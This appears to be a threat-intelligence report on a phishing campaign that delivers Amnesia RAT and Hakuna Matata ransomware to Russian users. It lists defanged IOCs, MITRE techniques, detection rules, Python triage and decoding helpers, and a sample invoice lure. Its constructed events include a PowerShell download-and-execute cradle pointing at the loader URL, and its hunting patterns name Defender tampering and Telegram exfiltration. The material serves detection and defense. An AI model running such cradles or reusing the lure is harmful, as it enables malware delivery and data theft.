Multi-Stage Amnesia Malware Campaign

BLUF

A highly structured phishing campaign targeting Russian users, delivering Amnesia RAT and Hakuna Matata ransomware via cloud services such as GitHub and Dropbox, which makes the delivery chain more resilient to takedowns of any single host.

Executive Cost Summary

This cost analysis was developed by the CyberDax team using expert judgment and assisted analytical tools to support clarity and consistency.

For organizations affected by a multi-stage phishing campaign delivering Amnesia RAT with ransomware capability:

·       Low-end total cost: $750,000 – $1.3 million

o   (limited endpoint spread, early containment, no confirmed data exfiltration)

·       Typical expected range: $1.5 million – $3.8 million

o   (credential theft confirmed, moderate operational disruption, partial recovery)

·       Upper-bound realistic scenarios: $4.0 million – $7.5 million

o   (broader persistence, data access concerns, regulatory and insurance friction)

Key Cost Drivers

·       Scope and dwell time of credential and session compromise

·       Number of endpoints requiring rebuild or credential reset

·       Business process dependency on affected user accounts

·       Regulatory notification thresholds triggered by access vs. exfiltration

·       Cyber insurance exclusions tied to control impairment or tooling misuse

Targeted Sectors

·       Business

·       Commercial

Countries

·       Russia

Date of First Reported Activity

·       January 24, 2026

Date of Last Reported Update

·       January 27, 2026

APT Groups

·       Not applicable

Criminal Organizations

·       Not known; suspected financially motivated

IOCs

As a reminder, detection should focus on the heuristic behavior of the attacks. Indicators such as hashes, domains, and similar artifacts can be useful for identifying historical activity; however, attackers are highly dynamic. These indicators often vary by target and attack, and can even change within the same attack.

Network Indicators (URLs)

Attackers utilized public cloud services to host malicious scripts and binaries to blend with legitimate traffic.

Initial Stage Loader

·       hxxps://raw.githubusercontent[.]com/scofild89/run/main/loader.ps1

Final Stage Payload

·       hxxps://www.dropbox[.]com/scl/fi/0gskgndm4uov9o94pnm87/client.exe?rlkey=5u5z5...

·       hxxps://www.dropbox[.]com/scl/fi/f2hsk8677fjk19p88f9a2/server.exe?rlkey=4x4y4... (Additional Binary Hosting)

File and Script Indicators

Stage 1

·       loader.ps1 (PowerShell): performs initial environment checks, then executes the Stage 2 orchestrator.

Stage 2

·       orchestrator.vbs (VBScript): obfuscated script responsible for defensive neutralization (e.g., abusing the Defendnot tool to disable Microsoft Defender).

Final Payloads

·       Amnesia_RAT.exe (Persistent surveillance and data theft)

·       Hakuna_Matata_Ransomware.exe (File encryption)

·       WinLocker.exe (System access restriction)

Behavioral Indicators

·       Defensive Neutralization

o   Operational abuse of the Defendnot research tool to disable Windows Security Center and Microsoft Defender.

·       Modular Hosting

o   Separation of infrastructure using GitHub for script distribution and Dropbox for binary payloads.

·       Lure Documents

o   The use of business-themed "decoy" documents that display fake status messages to distract the user while malicious activity runs in the background.

Tools used

·       PowerShell

·       GitHub

·       Dropbox

·       WinLocker component

TTPs:

Initial Access

·       T1566.001 Phishing: Spearphishing Attachment

o   Attackers deliver business-themed lures, such as compressed archives containing Russian-language documents related to accounting tasks.

Execution

·       T1204.002 User Execution: Malicious File

o   Victims are tricked into opening a malicious Windows Shortcut (LNK) file, often named with a double extension (e.g., .txt.lnk) so that it appears to be a text document when file extensions are hidden.

·       T1059.001 Command and Scripting Interpreter: PowerShell

o   The LNK target is a PowerShell command that downloads and runs the stage-one loader.

·       T1059.005 Command and Scripting Interpreter: Visual Basic

o   An obfuscated VBScript serves as the stage-two orchestrator that sets up the objects used by the later stages, including the defensive-neutralization step.

Persistence

·       T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder

o   Used to ensure the initial loader remains active across system restarts.

·       T1546.002 Event Triggered Execution: Screensaver

o   This campaign has been observed abusing screensaver settings as a persistence mechanism during later stages.

Defense Evasion

·       T1562.001 Impair Defenses: Disable or Modify Tools

o   Attackers use the Defendnot research tool to disable Microsoft Defender and prevent security scans.

·       T1027 Obfuscated Files or Information

o   Both the PowerShell scripts and VBScript orchestrators use heavy obfuscation to evade signature-based detection.

·       T1102.001 Web Service: Dead Drop Resolver

o   The campaign leverages GitHub to distribute scripts and Dropbox to host binary payloads, blending malicious traffic with legitimate cloud service activity. The payload retrieval itself is Ingress Tool Transfer (T1105); T1102.001 applies where the web-hosted content points to further infrastructure.
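A triage routine for the Execution and Defense Evasion behaviours listed above (double-extension LNK lures, PowerShell download cradles, script hosts run from the user's Temp folder, and Defendnot or Defender policy tampering), as an added Python example; it is not code from the original report or from any of the referenced vendors. The events are constructed to resemble Sysmon EID 1 (process create) and EID 11 (file create) fields. The file names, paths, parent processes and the loader command line are assumptions rather than observed campaign values; the only published item reused is the Stage 1 GitHub URL.

```python
import re
from typing import Dict, List

PS_HOSTS = {"powershell.exe", "pwsh.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}

# Double extension ending in .lnk, e.g. "report.txt.lnk" (T1204.002).
DOUBLE_EXT_LNK = re.compile(r"\.(txt|pdf|docx?|xlsx?|rtf)\.lnk$", re.IGNORECASE)
# Common PowerShell download-and-execute cradle tokens (T1059.001).
PS_CRADLE = re.compile(
    r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|\bIEX\b|Invoke-Expression"
    r"|-e(c|nc|ncodedcommand)?\b",
    re.IGNORECASE,
)
# Script host executing something out of the user's Temp directory (T1059.005).
TEMP_PATH = re.compile(r"\\AppData\\Local\\Temp\\", re.IGNORECASE)
# Defendnot plus the Defender policy/exclusion tampering the hunts below key on (T1562.001).
DEFENDER_TAMPER = re.compile(
    r"defendnot|DisableAntiSpyware|Add-MpPreference|Set-MpPreference|ExclusionPath",
    re.IGNORECASE,
)

# Constructed events (assumed values, not logs from the campaign). "type" is
# "process" for EID 1-like records and "file" for EID 11-like records.
SAMPLE_EVENTS = [
    {"type": "file", "image": r"C:\Windows\explorer.exe",
     "target": r"C:\Users\u\Downloads\Invoice_Details\Счет_2026.txt.lnk"},
    {"type": "process", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": "powershell.exe -w hidden -ep bypass -c \"IEX (New-Object Net.WebClient)"
                ".DownloadString('hxxps://raw.githubusercontent[.]com/scofild89/run/main/loader.ps1')\""},
    {"type": "process", "image": r"C:\Windows\System32\wscript.exe",
     "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"wscript.exe //B C:\Users\u\AppData\Local\Temp\orchestrator.vbs"},
    {"type": "process", "image": r"C:\Users\u\AppData\Local\Temp\defendnot.exe",
     "parent": r"C:\Windows\System32\wscript.exe",
     "cmdline": r"C:\Users\u\AppData\Local\Temp\defendnot.exe"},
    # Benign administrative PowerShell: must produce no findings.
    {"type": "process", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": "powershell.exe -NoProfile -Command Get-Date"},
]


def basename(path: str) -> str:
    """Lower-cased file name component of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def triage(ev: dict) -> List[str]:
    """Return the behaviours one event exhibits; an empty list means nothing suspicious."""
    hits: List[str] = []
    if ev["type"] == "file":
        # The LNK name is only visible when it is written/extracted, not in the
        # process event of its target, so it is checked on the file record.
        if DOUBLE_EXT_LNK.search(basename(ev["target"])):
            hits.append("T1204.002 double-extension LNK written to disk")
        return hits
    name, parent, cmd = basename(ev["image"]), basename(ev["parent"]), ev["cmdline"]
    if name in PS_HOSTS and PS_CRADLE.search(cmd):
        hits.append("T1059.001 PowerShell download/execute cradle")
        if parent == "explorer.exe":
            # A clicked LNK appears as explorer.exe spawning the shortcut's target directly.
            hits.append("spawned by explorer.exe (consistent with a clicked LNK)")
    if name in SCRIPT_HOSTS and TEMP_PATH.search(cmd):
        hits.append("T1059.005 script host running a file from %TEMP%")
    if DEFENDER_TAMPER.search(cmd) or DEFENDER_TAMPER.search(name):
        hits.append("T1562.001 Defender / Defendnot tampering")
    return hits


def run_triage(events=SAMPLE_EVENTS) -> Dict[int, List[str]]:
    """Map event index -> findings for every event that has at least one finding."""
    return {i: h for i, ev in enumerate(events) if (h := triage(ev))}


if __name__ == "__main__":
    for idx, findings in run_triage().items():
        print(idx, SAMPLE_EVENTS[idx].get("cmdline", SAMPLE_EVENTS[idx].get("target")))
        for f in findings:
            print("   ", f)
```

The parent-process check is the part worth keeping even if the regexes are tuned down: explorer.exe spawning PowerShell with a download cradle is how a clicked LNK looks, and it is rare in legitimate administration, where the parent is usually a console, a scheduler or a management agent.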

Discovery

·       T1082 System Information Discovery

o   The malware performs environment reconnaissance to identify system configurations and potential analysis tools.

Collection

·       T1555 Credentials from Password Stores

o   Amnesia RAT is specifically designed for credential theft and session hijacking; the browser cookie theft described in the behavior analysis below also maps to T1539 Steal Web Session Cookie.

·       T1125 Video Capture

o   The RAT includes real-time surveillance capabilities, such as screen capturing and webcam access.

Command and Control

·       T1104 Multi-Stage Channels

o   The attack employs multiple stages for command and control, calling back to different servers for each phase of the compromise.

Impact

·       T1486 Data Encrypted for Impact

o   The final stage of the attack often culminates in the deployment of a Hakuna Matata-derived ransomware payload to encrypt victim data.

Malware Name

·       Amnesia RAT

o   Sometimes observed as svchost.scr (a .scr screensaver file is an ordinary PE executable, which fits the screensaver persistence noted above)

sha256

·       c300943c88a0cae2eb609954b59c933b253c340f2997587830aee3d69adb7769

·       25e297f30215aa7001b85e8414890b2b7674bd7998bea4b9650ddc076df35114

Malware Family

·       Amnesia / Hakuna Matata (often deployed alongside Hakuna Matata-derived ransomware).

Known Decoding Key

·       The payload is reconstructed in memory through a layered decoding process: a Base64 decode first, followed by RC4 decryption. The referenced reports do not publish the RC4 key; it has to be recovered from the loader script itself.
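The decoding chain described above, as an added Python example (not code from the report, and not the loader's own script): Base64 is stripped first, then RC4 is applied, and the result is checked for an MZ header and against the two published SHA-256 values. RC4 is symmetric, so the same routine both builds the constructed sample blob and decodes it. The key ASSUMED_KEY and the sample payload are assumptions made up here; the real key lives in loader.ps1 and is not published.

```python
import base64
import hashlib

# Published sample hashes from this report; used only to recognise a recovered payload.
KNOWN_SHA256 = {
    "c300943c88a0cae2eb609954b59c933b253c340f2997587830aee3d69adb7769",
    "25e297f30215aa7001b85e8414890b2b7674bd7998bea4b9650ddc076df35114",
}


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA). Encryption and decryption are the same operation."""
    S = list(range(256))
    j = 0
    for i in range(256):                       # key-scheduling algorithm
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for byte in data:                          # pseudo-random generation algorithm
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def decode_layered(blob: str, key: bytes) -> bytes:
    """Layer 1: Base64 (tolerating stripped padding and embedded whitespace, which
    obfuscated scripts often introduce). Layer 2: RC4 with the recovered key."""
    cleaned = "".join(blob.split())
    cleaned += "=" * (-len(cleaned) % 4)
    return rc4(key, base64.b64decode(cleaned))


def encode_layered(payload: bytes, key: bytes) -> str:
    """Inverse of decode_layered; used here only to build the constructed sample."""
    return base64.b64encode(rc4(key, payload)).decode()


def looks_like_pe(data: bytes) -> bool:
    """A reconstructed Windows binary should begin with the MZ DOS header."""
    return data[:2] == b"MZ"


def matches_known_sample(data: bytes) -> bool:
    """True if the recovered bytes hash to one of the published sample hashes."""
    return hashlib.sha256(data).hexdigest() in KNOWN_SHA256


ASSUMED_KEY = b"example-rc4-key"    # assumption: stand-in for the key embedded in loader.ps1
# Constructed stand-in for a dropped executable: MZ header plus filler, not real malware.
SAMPLE_PAYLOAD = b"MZ" + b"\x90" * 62 + b"this is a stand-in, not real malware"
SAMPLE_BLOB = encode_layered(SAMPLE_PAYLOAD, ASSUMED_KEY)


def demo() -> bool:
    """Round-trip the constructed blob and apply the two sanity checks."""
    recovered = decode_layered(SAMPLE_BLOB, ASSUMED_KEY)
    return recovered == SAMPLE_PAYLOAD and looks_like_pe(recovered)


if __name__ == "__main__":
    print("round trip ok:", demo())
    print("known sample:", matches_known_sample(decode_layered(SAMPLE_BLOB, ASSUMED_KEY)))
```

When working on a real loader, the MZ check is the quick way to tell a wrong key from a right one: RC4 with the wrong key yields uniformly random-looking bytes, so the first two bytes will almost never be "MZ". The hash check then tells you whether what you recovered is one of the samples already reported or a new build.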

Verdict

·       Malicious (High Risk); capable of full system compromise and data exfiltration.

Primary Objectives

·       Extensive data theft from web browsers, cryptocurrency wallets, and messaging apps such as Telegram and Discord.

·       Providing remote command-and-control (C2) over infected hosts.

Behavior Analysis

Security Disruption

·       Utilizes the Defendnot tool, which registers a fake antivirus product with the Windows Security Center; Windows then treats a third-party AV as active and disables Microsoft Defender on its own.

Persistence & Lockdown

·       Disables administrative tools (Task Manager, Registry Editor) via registry policies (the DisableTaskMgr and DisableRegistryTools values under HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System are the standard mechanism and a quick check on a suspect host).

·       Neutralizes recovery mechanisms like Volume Shadow Copies and the Windows Recovery Environment (reagentc /disable), so that neither shadow-copy restore nor booting into WinRE is available after encryption.

Information Stealing

·       Targets Chromium-based browsers to steal cookies and saved credentials; the browser's encryption key (stored in its Local State file) is protected with Windows DPAPI, so the RAT, running in the victim's user context, can unwrap it and decrypt the stored data.

·       Hijacks Telegram Desktop sessions by exfiltrating the tdata directory.

·       Monitors the clipboard to intercept cryptocurrency seed phrases and modify wallet addresses during transactions.

C2 Communication

·       Establishes a two-way TCP connection to its C2 server and uses the Telegram Bot API for data exfiltration.
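The Suricata rule further down can only see the TLS SNI api.telegram.org, which legitimate bot integrations also use. Where a TLS-inspecting proxy logs the full URL, the Bot API path is a much tighter signal: every call carries the bot identity (/bot<id>:<token>/<method>), and the method names separate file uploads and update polling from ordinary traffic. The following is an added Python example, not code from the report or the referenced vendors. The log format, IP addresses, bot id, token and sizes are all constructed; reading getUpdates as inbound tasking is an inference from the "two-way" description above, not something the report states.

```python
import re
from collections import defaultdict
from typing import Dict

# Telegram Bot API URL shape: https://api.telegram.org/bot<id>:<token>/<method>
BOT_PATH = re.compile(r"https?://api\.telegram\.org/bot(\d+):([A-Za-z0-9_-]{30,})/(\w+)")
UPLOAD_METHODS = {"sendDocument", "sendPhoto", "sendVideo", "sendAudio", "sendVoice"}
TEXT_METHODS = {"sendMessage"}
POLL_METHODS = {"getUpdates", "getMe"}

# Constructed proxy log (assumed format, not campaign data):
# "<timestamp> <src_ip> <verb> <url> <status> <bytes_sent>"
SAMPLE_LOG = """\
2026-01-26T09:12:01Z 10.1.4.23 POST https://api.telegram.org/bot7123456789:AAHx1zYlQ0v-kq9Rm2T4u8WpX3cD6fG7hJ8/sendDocument 200 1843920
2026-01-26T09:12:44Z 10.1.4.23 POST https://api.telegram.org/bot7123456789:AAHx1zYlQ0v-kq9Rm2T4u8WpX3cD6fG7hJ8/sendMessage 200 612
2026-01-26T09:13:10Z 10.1.4.23 GET https://api.telegram.org/bot7123456789:AAHx1zYlQ0v-kq9Rm2T4u8WpX3cD6fG7hJ8/getUpdates 200 96
2026-01-26T09:15:02Z 10.1.7.8 GET https://web.telegram.org/a/ 200 1209
"""


def analyze(log: str = SAMPLE_LOG) -> Dict[str, dict]:
    """Group Bot API calls by (source host, bot id) and label what the bot is being used for."""
    sessions = defaultdict(lambda: {"methods": set(), "bytes_sent": 0})
    for line in log.splitlines():
        fields = line.split()
        if len(fields) != 6:
            continue                                   # skip malformed or blank lines
        _ts, src, _verb, url, _status, size = fields
        m = BOT_PATH.search(url)
        if not m:
            continue                                   # not a Bot API call (e.g. web client)
        bot_id, _token, method = m.groups()            # token is a credential: never store or print it
        s = sessions[f"{src}->bot{bot_id}"]
        s["methods"].add(method)
        s["bytes_sent"] += int(size)

    report = {}
    for key, s in sessions.items():
        verdict = []
        if s["methods"] & UPLOAD_METHODS:
            verdict.append("file upload to a bot (exfiltration)")
        if s["methods"] & TEXT_METHODS:
            verdict.append("text posts to a bot")
        if s["methods"] & POLL_METHODS:
            verdict.append("polls the bot for updates (possible inbound tasking)")
        if s["bytes_sent"] > 1_000_000:
            verdict.append(f"{s['bytes_sent']} bytes sent")
        report[key] = {"methods": sorted(s["methods"]), "bytes_sent": s["bytes_sent"],
                       "verdict": verdict}
    return report


if __name__ == "__main__":
    for key, info in analyze().items():
        print(key, info["methods"], "->", "; ".join(info["verdict"]))
```

Two practical points: the bot id alone is enough to correlate hosts talking to the same operator bot across the estate, so report that and redact the token when sharing findings; and sendDocument from a workstation that has no business running a Telegram integration is the single strongest line in this output, independent of the volume threshold.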

CVEs

·       Not applicable

Suggested Rules / potential hunts

As a reminder, these are indicator rules. They are likely to be noisy.

For best results consider creating a data model and reviewing the traffic as a report.

Suricata Rules

·       Alert on download of the Stage 1 loader from GitHub raw content

alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"Possible Amnesia Campaign Stage-1 Loader Download (GitHub raw)"; flow:established,to_server; http.method; content:"GET"; http.host; content:"raw.githubusercontent.com"; http.uri; content:"/scofild89/run/main/loader.ps1"; sid:1000001; rev:2;)

Note: raw.githubusercontent.com and dropbox.com serve over HTTPS only, so the HTTP buffers above are populated only where TLS is terminated and decrypted ahead of the sensor. On encrypted traffic only the SNI is visible, and a tls.sni match on those hosts will fire on legitimate use as well.

 

·       Alert on the user-agent string used in the malicious scripts

alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"Suspicious User-Agent Potential Amnesia C2"; flow:established,to_server; http.user_agent; content:"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"; sid:1000002; rev:2;)

Note: this string is the standard Chrome/Edge user-agent prefix, so on its own it matches nearly every browser request. Scope it to hosts that should not be browsing, or combine it with the GitHub and Telegram matches, before deploying it.

 

·       Detect data exfiltration/C2 via Telegram bots (common in this campaign)

alert tls $HOME_NET any -> $EXTERNAL_NET 443 (msg:"Potential Amnesia RAT Data Exfiltration to Telegram Bot API"; flow:established,to_server; tls.sni; content:"api.telegram.org"; nocase; sid:1000003; rev:2;)

Note: api.telegram.org is the Bot API endpoint, not the endpoint the Telegram desktop or mobile clients use, so this is tighter than matching Telegram traffic generally; it will still fire on legitimate bot integrations.

SentinelOne

·       Look for Defendnot execution or Defender exclusion tampering on the command line (the Windows Security Center registration Defendnot performs is not itself a process event; the command line is the visible artifact).

s1ql

EventType = "Process Creation" AND (Process.cmdline contains "defendnot" OR Process.cmdline contains "Add-MpPreference" OR Process.cmdline contains "ExclusionPath")

 

·       Detects obfuscated PowerShell commands designed to download and execute payloads.

s1ql

Endpoint.name in (*) AND EventType = "Process Creation" AND Process.name = "powershell.exe" AND (Process.cmdline contains "DownloadString" OR Process.cmdline contains "Invoke-Expression" OR Process.cmdline contains "-EncodedCommand")

 

·       Detects the Hakuna Matata ransomware encryption activity.

s1ql

Endpoint.name in (*) AND EventType = "File Modification" AND File.name contains ".@NeverMind12F"

Splunk

·       Detects when cscript.exe or wscript.exe runs a file from temporary folders.

index=windows sourcetype="XmlWinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode=1

(Image="*\\cscript.exe" OR Image="*\\wscript.exe") AND CommandLine="*\\AppData\\Local\\Temp\\*"

| table _time, Computer, User, CommandLine, ParentImage

 

·       Identifies registry changes or command-line arguments used to disable security settings.

index=windows sourcetype="XmlWinEventLog:Microsoft-Windows-Sysmon/Operational"

((EventCode=1 AND (CommandLine="*Defendnot*" OR CommandLine="*DisableAntiSpyware*"))

OR (EventCode=13 AND TargetObject="*\\Policies\\Microsoft\\Windows Defender*"))

| stats count by Computer, User, CommandLine, TargetObject

 

·       Detects high-volume connections to GitHub/Dropbox, indicative of staging (the threshold of 50 is arbitrary; tune it against a baseline for your environment).

index=proxy sourcetype=access_combined (site="github.com" OR site="dropbox.com")

| stats count by src_ip, site, url

| where count > 50

Delivery Method

·       Spear-phishing emails with business-themed archives containing decoy documents and malicious LNK files.

Email example

The lures typically use fake business documents—such as invoices, contracts, or shipping notifications—to trick recipients into initiating the infection chain.

While the exact text varies, a representative example based on the campaign's tactics is as follows:

Subject

·       Action Required

·       Overdue Invoice [Reference Number]

Body

Dear [Name/Department],

Attached is the outstanding invoice for the services rendered in the previous quarter. Please review the document and confirm payment by the end of the business day to avoid service interruption.

Thank you,

[Fake Business Name] Accounts Payable

Attachment

·       Invoice_Details.zip or a business-themed document (e.g., .doc or .pdf) containing malicious scripts.

References

Fortinet

·       hxxps://www.fortinet.com/blog/threat-research/inside-a-multi-stage-windows-malware-campaign

The Hacker News

·       hxxps://thehackernews.com/2026/01/multi-stage-phishing-campaign-targets.html

GBHackers

·       hxxps://gbhackers.com/windows-malware-3/

VirusTotal

·       hxxps://www.virustotal.com/gui/file/c300943c88a0cae2eb609954b59c933b253c340f2997587830aee3d69adb7769/details
